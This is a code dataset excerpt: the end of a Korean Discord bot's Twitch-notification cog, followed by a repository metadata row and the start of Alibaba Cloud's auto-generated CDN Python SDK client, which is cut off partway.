twitch_resp = await twitch_cur.fetchall()
premium_resp = await premium_cur.fetchone()
if twitch_resp == []:
return await ctx.reply("등록된 채널이 하나도 없어요! `하린아 트위치 등록 [채널ID]`로 등록하세요!")
if premium_resp == None:
em = discord.Embed(title="트위치 채널 목록 | 프리플랜(채널 개수 1개 제한)",colour=discord.Colour.random())
for i in twitch_resp:
status = await self.TwitchManager.get_channel_status([i[3]])
stream_info = next(iter(status), None)
if not stream_info:
em.add_field(name=f"채널: {stream_info['user_name']}({i[3]})",value="스트리밍 상태: <:Offline:911928110381953074>오프라인")
else:
em.add_field(
name=f"채널: {stream_info['user_name']}({i[3]})",value=f"스트리밍 상태: <:streaming:911928055197478912>스트리밍중 [{stream_info['title']}](https://twitch.tv/{stream_info['user_name']})")
return await ctx.reply(embed=em)
formatted_leaderboard = []
for i in twitch_resp:
status = await self.TwitchManager.get_channel_status([i[3]])
stream_info = next(iter(status), None)
try:
formatted_leaderboard.append(
f"채널: {stream_info['user_name']}({i[3]})\n스트리밍 상태: <:streaming:911928055197478912>스트리밍중 [{stream_info['title']}](https://twitch.tv/{stream_info['user_name']})")
except:
formatted_leaderboard.append(f"채널: {i[3]}\n스트리밍 상태: <:Offline:911928110381953074>오프라인")
e = Paginator(
client=self.bot.components_manager,
embeds=discordSuperUtils.generate_embeds(
formatted_leaderboard,
title="트위치 채널 목록 | <:supporter_badge:904937799701110814>프리미엄플랜(채널 개수 5개 제한)",
fields=3,
description=f"{ctx.guild}의 트위치 알림 채널 목록",
),
channel=ctx.channel,
only=ctx.author,
ctx=ctx,
use_select=False)
await e.start()
@twitch_.command(name="검색")
async def twitch_lookup(self,ctx,*, channel: str):
status = await self.TwitchManager.get_channel_status([channel])
stream_info = next(iter(status), None)
if not stream_info:
await ctx.send(f"<:Offline:911928110381953074> '{channel}'은 오프라인이거나 존재하지않는 채널이에요.")
return
embed = discord.Embed(title=f"<:streaming:911928055197478912> '{stream_info['user_name'] or channel}' 은 스트리밍중이에요!", color=0x00FF00)
self.add_stream_fields(embed, stream_info)
await ctx.reply(embed=embed)
@twitch_.command(name="등록")
async def twitch_add(self,ctx,role:discord.Role,notice_channel:discord.TextChannel,*, channel: str):
db = await aiosqlite.connect("db/db.sqlite")
twitch_cur = await db.execute("SELECT * FROM twitch WHERE guild = ?", (ctx.guild.id,))
premium_cur = await db.execute("SELECT * FROM premium WHERE guild = ?", (ctx.guild.id,))
twitch_resp = await twitch_cur.fetchall()
premium_resp = await premium_cur.fetchone()
if premium_resp == None:
if twitch_resp == []:
await db.execute("INSERT INTO twitch(guild, notice_channel, notice_role, channel) VALUES (?, ?, ?, ?)",
(ctx.guild.id, notice_channel.id, role.id, channel))
await db.commit()
await self.TwitchManager.add_channel(ctx.guild, channel)
return await ctx.reply(f"성공적으로 '{channel}'을 등록했어요.")
else:
return await ctx.reply("프리미엄을 사용중이지않아 추가 등록하지못했어요. 추가 등록을 원하시면 프리미엄을 구매해주세요.")
else:
if twitch_resp == [] or len(list(twitch_resp)) <= 5:
await db.execute("INSERT INTO twitch(guild, notice_channel, notice_role, channel) VALUES (?, ?, ?, ?)",
(ctx.guild.id, notice_channel.id, role.id, channel))
await db.commit()
#await self.TwitchManager.add_channel(ctx.guild, channel)
return await ctx.reply(f"성공적으로 '{channel}'을 등록했어요.")
else:
return await ctx.reply("앗! 등록된 채널 개수가 5개여서 등록하지 못했어요..😥")
@twitch_.command(name="해제")
async def twitch_del(self,ctx):
db = await aiosqlite.connect("db/db.sqlite")
twitch_cur = await db.execute("SELECT * FROM twitch WHERE guild = ?", (ctx.guild.id,))
twitch_resp = await twitch_cur.fetchall()
if twitch_resp == []:
return await ctx.reply("등록된 채널이 하나도 없어요! `하린아 트위치 등록 [채널ID]`로 등록하세요!")
msg = await ctx.send(f"{ctx.author.mention}, 아래의 목록중 알림 해제하고싶은 채널을 선택하세요.",
components=[
Select(placeholder="알림 해제 채널 선택",
options=[
SelectOption(label=i[3],
value=i[3]) for i in twitch_resp
], )
],
)
try:
interaction = await self.bot.wait_for(
"select_option", check=lambda inter: inter.user.id == ctx.author.id
)
value = interaction.values[0]
except asyncio.TimeoutError:
await msg.edit("시간이 초과되었어요!", components=[])
return
##await self.TwitchManager.remove_channel(ctx.guild, value)
await db.execute("DELETE FROM twitch WHERE guild = ? AND channel = ?",(ctx.guild.id,value))
await db.commit()
await msg.edit("성공적으로 알림해제를 하였어요!",components=[])
@staticmethod
async def channel_statues(url,headers):
async with aiohttp.ClientSession(headers=headers) as cs2:
async with cs2.get(url) as res2:
pr2 = await res2.read()
sid2 = pr2.decode('utf-8')
return json.loads(sid2)
async def twitch_loop(self):
await self.bot.wait_until_ready()
db = await aiosqlite.connect("db/db.sqlite")
while not self.bot.is_closed():
await asyncio.sleep(5)
twitch_cur = await db.execute("SELECT * FROM twitch")
datas = await twitch_cur.fetchall()
headers = {'Client-Id': os.getenv("TWITCH_CLIENT_ID"),
'Authorization': "Bearer " + self.access_token}
for i in datas:
url = "https://api.twitch.tv/helix/users?login=" + i[3]
async with aiohttp.ClientSession(headers=headers) as cs2:
async with cs2.get(url) as res2:
pr2 = await res2.read()
sid2 = pr2.decode('utf-8')
answer2 = json.loads(sid2)
try:
url2 = "https://api.twitch.tv/helix/search/channels?query=" + i[3]
jsons = await self.channel_statues(url2,headers)
for j in jsons['data']:
if j['display_name'] == answer2['data'][0]['display_name']:
if j['is_live']:
try:
if self.live[j['broadcaster_login']]:
pass
else:
self.live[j['broadcaster_login']] = True
status = await self.TwitchManager.get_channel_status([j['broadcaster_login']])
stream_info = next(iter(status), None)
embed = discord.Embed(
title=f"<:streaming:911928055197478912> '{j['display_name']}'님이 스트리밍을 시작하였어요!",
color=0x00FF00)
#self.loop_stream_fields(embed, j)
self.add_stream_fields(embed,stream_info)
channel = self.bot.get_channel(i[1])
await channel.send(content=f"<@&{i[2]}>",embed=embed,components=[Button(style=5,
url=f"https://twitch.tv/{j['broadcaster_login']}",
label=f"{j['display_name']}님의 방송 보러가기",
emoji=self.bot.get_emoji(911928055197478912))])
except:
self.live[j['broadcaster_login']] = False
else:
try:
if self.live[j['broadcaster_login']]:
embed = discord.Embed(
title=f"<:Offline:911928110381953074> '{j['display_name']}'님이 스트리밍을 종료했어요!",
color=0x00FF00)
embed.add_field(
name="채널 방문하기",
value=f"[{j['display_name']}](https://twitch.tv/{j['broadcaster_login']})",
inline=False,
)
embed.set_image(
url=j["thumbnail_url"].format(height=248, width=440))
channel = self.bot.get_channel(i[1])
await channel.send(embed=embed,components=[Button(style=5,
url=f"https://twitch.tv/{j['broadcaster_login']}",
label=f"{j['display_name']}님의 채널 방문하기")])
self.live[j['broadcaster_login']] = False
except:
self.live[j['broadcaster_login']] = False
except:
user = await self.bot.fetch_user(281566165699002379)
await user.send(str(traceback.format_exc()))
def setup(bot):
bot.add_cog(twitch(bot))
| [
"popop098@naver.com"
] | popop098@naver.com |
c273e5c4afb916b2bfe8fda1dff478b84e299c6e | 27aaadf435779c29012233cb1dacf27bd9dd0d0f | /cdn-20141111/alibabacloud_cdn20141111/client.py | ef23e019ac3566d3e731afcffe814a639e52c28f | [
"Apache-2.0"
] | permissive | aliyun/alibabacloud-python-sdk | afadedb09db5ba6c2bc6b046732b2a6dc215f004 | e02f34e07a7f05e898a492c212598a348d903739 | refs/heads/master | 2023-08-22T20:26:44.695288 | 2023-08-22T12:27:39 | 2023-08-22T12:27:39 | 288,972,087 | 43 | 29 | null | 2022-09-26T09:21:19 | 2020-08-20T10:08:11 | Python | UTF-8 | Python | false | false | 99,229 | py | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from typing import Dict
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_endpoint_util.client import Client as EndpointUtilClient
from alibabacloud_cdn20141111 import models as cdn_20141111_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = 'central'
self._endpoint_map = {
'ap-northeast-1': 'cdn.ap-southeast-1.aliyuncs.com',
'ap-south-1': 'cdn.ap-southeast-1.aliyuncs.com',
'ap-southeast-1': 'cdn.ap-southeast-1.aliyuncs.com',
'ap-southeast-2': 'cdn.ap-southeast-1.aliyuncs.com',
'ap-southeast-3': 'cdn.ap-southeast-1.aliyuncs.com',
'ap-southeast-5': 'cdn.ap-southeast-1.aliyuncs.com',
'eu-central-1': 'cdn.ap-southeast-1.aliyuncs.com',
'eu-west-1': 'cdn.ap-southeast-1.aliyuncs.com',
'me-east-1': 'cdn.ap-southeast-1.aliyuncs.com',
'us-east-1': 'cdn.ap-southeast-1.aliyuncs.com',
'us-west-1': 'cdn.ap-southeast-1.aliyuncs.com'
}
self.check_config(config)
self._endpoint = self.get_endpoint('cdn', self._region_id, self._endpoint_rule, self._network, self._suffix, self._endpoint_map, self._endpoint)
def get_endpoint(
self,
product_id: str,
region_id: str,
endpoint_rule: str,
network: str,
suffix: str,
endpoint_map: Dict[str, str],
endpoint: str,
) -> str:
if not UtilClient.empty(endpoint):
return endpoint
if not UtilClient.is_unset(endpoint_map) and not UtilClient.empty(endpoint_map.get(region_id)):
return endpoint_map.get(region_id)
return EndpointUtilClient.get_endpoint_rules(product_id, region_id, endpoint_rule, network, suffix)
def add_cdn_domain_with_options(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.AddCdnDomainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.cdn_type):
query['CdnType'] = request.cdn_type
if not UtilClient.is_unset(request.check_url):
query['CheckUrl'] = request.check_url
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_account):
query['OwnerAccount'] = request.owner_account
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.priorities):
query['Priorities'] = request.priorities
if not UtilClient.is_unset(request.region):
query['Region'] = request.region
if not UtilClient.is_unset(request.resource_group_id):
query['ResourceGroupId'] = request.resource_group_id
if not UtilClient.is_unset(request.scope):
query['Scope'] = request.scope
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.source_port):
query['SourcePort'] = request.source_port
if not UtilClient.is_unset(request.source_type):
query['SourceType'] = request.source_type
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
if not UtilClient.is_unset(request.top_level_domain):
query['TopLevelDomain'] = request.top_level_domain
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='AddCdnDomain',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.AddCdnDomainResponse(),
self.call_api(params, req, runtime)
)
async def add_cdn_domain_with_options_async(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.AddCdnDomainResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.cdn_type):
query['CdnType'] = request.cdn_type
if not UtilClient.is_unset(request.check_url):
query['CheckUrl'] = request.check_url
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_account):
query['OwnerAccount'] = request.owner_account
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.priorities):
query['Priorities'] = request.priorities
if not UtilClient.is_unset(request.region):
query['Region'] = request.region
if not UtilClient.is_unset(request.resource_group_id):
query['ResourceGroupId'] = request.resource_group_id
if not UtilClient.is_unset(request.scope):
query['Scope'] = request.scope
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.source_port):
query['SourcePort'] = request.source_port
if not UtilClient.is_unset(request.source_type):
query['SourceType'] = request.source_type
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
if not UtilClient.is_unset(request.top_level_domain):
query['TopLevelDomain'] = request.top_level_domain
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='AddCdnDomain',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.AddCdnDomainResponse(),
await self.call_api_async(params, req, runtime)
)
def add_cdn_domain(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
) -> cdn_20141111_models.AddCdnDomainResponse:
runtime = util_models.RuntimeOptions()
return self.add_cdn_domain_with_options(request, runtime)
async def add_cdn_domain_async(
self,
request: cdn_20141111_models.AddCdnDomainRequest,
) -> cdn_20141111_models.AddCdnDomainResponse:
runtime = util_models.RuntimeOptions()
return await self.add_cdn_domain_with_options_async(request, runtime)
def describe_cdn_domain_detail_with_options(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainDetail',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainDetailResponse(),
self.call_api(params, req, runtime)
)
async def describe_cdn_domain_detail_with_options_async(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainDetail',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainDetailResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_cdn_domain_detail(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
runtime = util_models.RuntimeOptions()
return self.describe_cdn_domain_detail_with_options(request, runtime)
async def describe_cdn_domain_detail_async(
self,
request: cdn_20141111_models.DescribeCdnDomainDetailRequest,
) -> cdn_20141111_models.DescribeCdnDomainDetailResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_cdn_domain_detail_with_options_async(request, runtime)
def describe_cdn_domain_logs_with_options(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.log_day):
query['LogDay'] = request.log_day
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.page_number):
query['PageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['PageSize'] = request.page_size
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainLogs',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainLogsResponse(),
self.call_api(params, req, runtime)
)
async def describe_cdn_domain_logs_with_options_async(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.log_day):
query['LogDay'] = request.log_day
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.page_number):
query['PageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['PageSize'] = request.page_size
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnDomainLogs',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnDomainLogsResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_cdn_domain_logs(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
runtime = util_models.RuntimeOptions()
return self.describe_cdn_domain_logs_with_options(request, runtime)
async def describe_cdn_domain_logs_async(
self,
request: cdn_20141111_models.DescribeCdnDomainLogsRequest,
) -> cdn_20141111_models.DescribeCdnDomainLogsResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_cdn_domain_logs_with_options_async(request, runtime)
def describe_cdn_service_with_options(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnService',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnServiceResponse(),
self.call_api(params, req, runtime)
)
async def describe_cdn_service_with_options_async(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeCdnService',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeCdnServiceResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_cdn_service(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
runtime = util_models.RuntimeOptions()
return self.describe_cdn_service_with_options(request, runtime)
async def describe_cdn_service_async(
self,
request: cdn_20141111_models.DescribeCdnServiceRequest,
) -> cdn_20141111_models.DescribeCdnServiceResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_cdn_service_with_options_async(request, runtime)
def describe_domain_bps_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_bps_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_bps_data(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_bps_data_with_options(request, runtime)
async def describe_domain_bps_data_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_bps_data_with_options_async(request, runtime)
def describe_domain_bps_data_by_time_stamp_with_options(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.isp_names):
query['IspNames'] = request.isp_names
if not UtilClient.is_unset(request.location_names):
query['LocationNames'] = request.location_names
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.time_point):
query['TimePoint'] = request.time_point
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsDataByTimeStamp',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_bps_data_by_time_stamp_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.isp_names):
query['IspNames'] = request.isp_names
if not UtilClient.is_unset(request.location_names):
query['LocationNames'] = request.location_names
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.time_point):
query['TimePoint'] = request.time_point
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainBpsDataByTimeStamp',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_bps_data_by_time_stamp(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_bps_data_by_time_stamp_with_options(request, runtime)
async def describe_domain_bps_data_by_time_stamp_async(
self,
request: cdn_20141111_models.DescribeDomainBpsDataByTimeStampRequest,
) -> cdn_20141111_models.DescribeDomainBpsDataByTimeStampResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_bps_data_by_time_stamp_with_options_async(request, runtime)
def describe_domain_file_size_proportion_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFileSizeProportionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse(),
self.call_api(params, req, runtime)
)
async def describe_domain_file_size_proportion_data_with_options_async(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFileSizeProportionData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_domain_file_size_proportion_data(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
runtime = util_models.RuntimeOptions()
return self.describe_domain_file_size_proportion_data_with_options(request, runtime)
async def describe_domain_file_size_proportion_data_async(
self,
request: cdn_20141111_models.DescribeDomainFileSizeProportionDataRequest,
) -> cdn_20141111_models.DescribeDomainFileSizeProportionDataResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domain_file_size_proportion_data_with_options_async(request, runtime)
def describe_domain_flow_data_with_options(
self,
request: cdn_20141111_models.DescribeDomainFlowDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeDomainFlowDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeDomainFlowData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
